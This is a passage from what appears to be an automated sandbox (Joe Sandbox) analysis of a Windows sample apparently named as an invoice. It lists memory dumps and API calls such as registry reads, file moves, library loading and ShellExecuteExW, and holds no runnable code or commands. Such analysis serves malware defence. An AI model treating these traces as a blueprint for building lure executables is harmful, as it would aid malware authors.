    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • SetRectEmpty.USER32(?), ref: 004A6E25
    • DrawTextW.USER32(00000000,00000000,?,?,00000D20), ref: 004A6E5A
    • DrawTextW.USER32(?,00000000,?,00000000,00000800), ref: 004A6EEC
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetModuleHandleW.KERNEL32(kernel32.dll,GetDiskFreeSpaceExW,00000000,004B0BC1), ref: 004B0AB1
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409644
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409666
      • Part of subcall function 004ACF58: Wow64DisableWow64FsRedirection.KERNEL32(?,00000000,004AD572,?,00000000,00000000,00000000,00000000,?,004FE5FF,00000000,004FE609,?,00000000,00000000,00000000), ref: 004ACF73
      • Part of subcall function 004ACF58: SetLastError.KERNEL32(00000001,00000000,004AD572,?,00000000,00000000,00000000,00000000,?,004FE5FF,00000000,004FE609,?,00000000,00000000,00000000), ref: 004ACF8A
      • Part of subcall function 0047E6BC: GetFullPathNameW.KERNEL32(00000000,00001000,?,?,00000002,?,?,00000000,00000000,004AE62F,00000000,004AE916,?,?,00000000,0050B17C), ref: 0047E6ED
    • GetDiskFreeSpaceW.KERNEL32(00000000,?,?,?,?,00000000,004B0B9F,?,00000000,kernel32.dll,GetDiskFreeSpaceExW,00000000,004B0BC1), ref: 004B0B54
      • Part of subcall function 004ACF94: Wow64RevertWow64FsRedirection.KERNEL32(?,004AD5BB,004AD5C3,?,00000000,00000000,00000000,00000000,?,004FE5FF,00000000,004FE609,?,00000000,00000000,00000000), ref: 004ACF9D
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetDC.USER32(00000000), ref: 0048103E
      • Part of subcall function 00430D88: CreateFontIndirectW.GDI32(?), ref: 00430F23
    • SelectObject.GDI32(?,00000000), ref: 00481061
      • Part of subcall function 00480574: GetTextExtentPoint32W.GDI32(?,00000000,?,?), ref: 004805D3
    • ReleaseDC.USER32(00000000,?), ref: 00481147
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 0047EB44: GetFileAttributesW.KERNEL32(00000000,00000000,004ABD07,00000000,?), ref: 0047EB4F
    • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 004AE1E3
    • CloseHandle.KERNEL32(00000000), ref: 004AE1F3
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 0047CEE8: GetCursorPos.USER32 ref: 0047CEEF
    • SetTimer.USER32(00000000,00000000,503B0C55,00000000), ref: 0047D05F
      • Part of subcall function 0047CE84: IsWindowVisible.USER32(00000000), ref: 0047CEBC
      • Part of subcall function 0047CE84: IsWindowEnabled.USER32(00000000), ref: 0047CECD
    • GetCurrentThreadId.KERNEL32(00000000,0047D0DD,?,?,?,01484140), ref: 0047D099
    • WaitMessage.USER32 ref: 0047D0BD
      • Part of subcall function 0042A364: GetCurrentThreadId.KERNEL32 ref: 0042A36F
      • Part of subcall function 0042A364: GetCurrentThreadId.KERNEL32 ref: 0042A37E
      • Part of subcall function 0042A364: EnterCriticalSection.KERNEL32(0050AE80), ref: 0042A3C3
      • Part of subcall function 0042A364: InterlockedExchange.KERNEL32(00502EC8,?), ref: 0042A3DF
      • Part of subcall function 0042A364: LeaveCriticalSection.KERNEL32(0050AE80,00000000,0042A527,?,00502EC8,?,00000000,0042A546,?,0050AE80), ref: 0042A438
      • Part of subcall function 0042A364: EnterCriticalSection.KERNEL32(0050AE80,0042A4D0,0050AE80,00000000,0042A527,?,00502EC8,?,00000000,0042A546,?,0050AE80), ref: 0042A4C3
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetFileAttributesW.KERNEL32(00000000,005015E7,00000000,004FE1BC,?,?,00000000,0050B17C,?,004FE5FF,00000000,004FE609,?,00000000,00000000,00000000), ref: 004FE12E
    • SetFileAttributesW.KERNEL32(00000000,00000000,00000000,005015E7,00000000,004FE1BC,?,?,00000000,0050B17C,?,004FE5FF,00000000,004FE609,?,00000000), ref: 004FE157
    • MoveFileExW.KERNEL32(00000000,00000000,00000001), ref: 004FE170
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • IsWindowVisible.USER32(?), ref: 004635D7
    • ScrollWindow.USER32(?,?,?,00000000,00000000), ref: 00463606
    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0046367C
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0040F9D5), ref: 0040F96C
    • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000100), ref: 0040F972
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 004FC4A2
      • Part of subcall function 0047F17C: GetCommandLineW.KERNEL32(00000000,0047F1BE,?,00000000,00000000,?,004E2AD9,-00000010,?,00000004,0000001C,00000000,004E2CF7,?,004B9C20,00000000), ref: 0047F192
      • Part of subcall function 004D8F68: ShellExecuteExW.SHELL32(0000003C), ref: 004D8FEF
      • Part of subcall function 004D8F68: GetLastError.KERNEL32(00000000,004D90B7,?,?,?), ref: 004D8FF8
      • Part of subcall function 004D8F68: MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004D9045
      • Part of subcall function 004D8F68: GetExitCodeProcess.KERNEL32(00000000,?), ref: 004D906B
      • Part of subcall function 004D8F68: CloseHandle.KERNEL32(00000000), ref: 004D908F
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 004A9DB8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004A9DD0
    • LoadLibraryW.KERNEL32(00000000), ref: 004A9E3F
    • LoadLibraryW.KERNEL32(00000000), ref: 004A9E85
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 0047E6BC: GetFullPathNameW.KERNEL32(00000000,00001000,?,?,00000002,?,?,00000000,00000000,004AE62F,00000000,004AE916,?,?,00000000,0050B17C), ref: 0047E6ED
    • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 004B19BF
    • RegisterTypeLib.OLEAUT32(?,00000000,00000000), ref: 004B19DB
      • Part of subcall function 00405E28: SysFreeString.OLEAUT32(?), ref: 00405E36
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 0047BF28: SetWindowTextW.USER32(?,00000000), ref: 0047BF58
      • Part of subcall function 0047BF28: SetWindowTextW.USER32(?,00000000), ref: 0047BF6E
    • GetFocus.USER32 ref: 004D922E
    • GetKeyState.USER32(0000007A), ref: 004D9245
    • WaitMessage.USER32 ref: 004D924F
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 004A6484: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004A649C
    • LoadLibraryW.KERNEL32(00000000), ref: 004A64FC
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409644
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409666
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • FindResourceW.KERNEL32(00400000,CHARTABLE,0000000A), ref: 0040AA40
    • LoadResource.KERNEL32(00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040A9F4,00000000,00451ABD,00000000,00451BD7,?,?,?,00000000), ref: 0040AA57
    • LockResource.KERNEL32(00000000,00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040A9F4,00000000,00451ABD,00000000,00451BD7,?,?,?), ref: 0040AA68
      • Part of subcall function 004135BC: GetLastError.KERNEL32(0040AA79,00000000,00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040A9F4,00000000,00451ABD,00000000,00451BD7), ref: 004135BC
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • DeleteObject.GDI32(870801FD), ref: 00437954
    • DeleteCriticalSection.KERNEL32(Function_0010AF08,870801FD,00000000,004379A5), ref: 0043795E
    • DeleteCriticalSection.KERNEL32(0050AF20,Function_0010AF08,870801FD,00000000,004379A5), ref: 00437968
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetModuleHandleW.KERNEL32(user32.dll), ref: 004FA938
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409644
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409666
      • Part of subcall function 004FA8F0: SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004FA901
      • Part of subcall function 004FA8F0: GetSystemMetrics.USER32(00000001), ref: 004FA90C
      • Part of subcall function 004FA8F0: GetSystemMetrics.USER32(00000000), ref: 004FA915
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • FileTimeToLocalFileTime.KERNEL32(?), ref: 004CC9E8
    • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 004CC9F7
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 0047FD20: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,004803F6,?,00000000,?,00480396,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6), ref: 0047FD3C
    • RegCloseKey.ADVAPI32(00000000,?,00000001,00000000,00000003,004B4800,00000003,00000000,004B49B7,00000000,004B4B71,?,004B4800,?,00000000,00000000), ref: 004B4861
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 0047FD20: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,004803F6,?,00000000,?,00480396,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6), ref: 0047FD3C
    • RegQueryValueExW.ADVAPI32(?,CSDVersion,00000000,?,?,00000004,?,00000001,00000000), ref: 004E6BA9
    • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,00000004,?,00000001,00000000), ref: 004E6BCC
    Strings
    • CSDVersion, xrefs: 004E6BA0
    • System\CurrentControlSet\Control\Windows, xrefs: 004E6B76
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • RegDeleteKeyW.ADVAPI32(?,00000000), ref: 0047FD54
    • GetModuleHandleW.KERNEL32(advapi32.dll,RegDeleteKeyExW,?,00000000,0047FF3B,00000000,0047FF53,?,?,?), ref: 0047FD6F
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409644
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409666
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,00480A2C,00000004,00503F6C,004B1F3E,004B2358,004B1E94,00000000,00000B06,00000000,00000000), ref: 0048095A
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409644
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409666
    • InterlockedExchange.KERNEL32(0050B1A8,00000001), ref: 00480971
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetWindowThreadProcessId.USER32(00000000), ref: 004D84C8
    • GetModuleHandleW.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,004D8612), ref: 004D84DB
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409644
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409666
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 004AD294: FindFirstFileW.KERNEL32(00000000,?,00000000,004AD2F7,?,?,?,00000000), ref: 004AD2D1
      • Part of subcall function 004AD294: GetLastError.KERNEL32(00000000,?,00000000,004AD2F7,?,?,?,00000000), ref: 004AD2D9
      • Part of subcall function 004D1578: FindNextFileW.KERNEL32(000000FF,?,00000000,004D1761,?,00000000,?,00000000,00000000,004D1934,?,00000000,?,004D1B22,00000000,?), ref: 004D173D
      • Part of subcall function 004D1578: FindClose.KERNEL32(000000FF,004D1768,004D1761,?,00000000,?,00000000,00000000,004D1934,?,00000000,?,004D1B22,00000000,?,00000000), ref: 004D175B
    • FindNextFileW.KERNEL32(000000FF,?,00000000,004D1864,?,004D1954,?,00000000,00000000,?,00000000,00000000,004D1934,?,00000000), ref: 004D1840
    • FindClose.KERNEL32(000000FF,004D186B,004D1864,?,004D1954,?,00000000,00000000,?,00000000,00000000,004D1934,?,00000000,?,004D1B22), ref: 004D185E
      • Part of subcall function 004CE410: GetLastError.KERNEL32(00000000,004CE619,?,0050BE1C,00000000,00000000,00000000,00000000,?,004CE98A,?,00000000,004CEAD4,?,?,0050BE1C), ref: 004CE4E9
      • Part of subcall function 004CE410: SHChangeNotify.SHELL32(00000008,00000005,00000000,00000000), ref: 004CE567
      • Part of subcall function 004CE410: SHChangeNotify.SHELL32(00001000,00001005,00000000,00000000), ref: 004CE58C
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • Sleep.KERNEL32(?,00000000,0046AB2A), ref: 0046A7A8
    • ShowWindow.USER32(00000000,00000004), ref: 0046A7F0
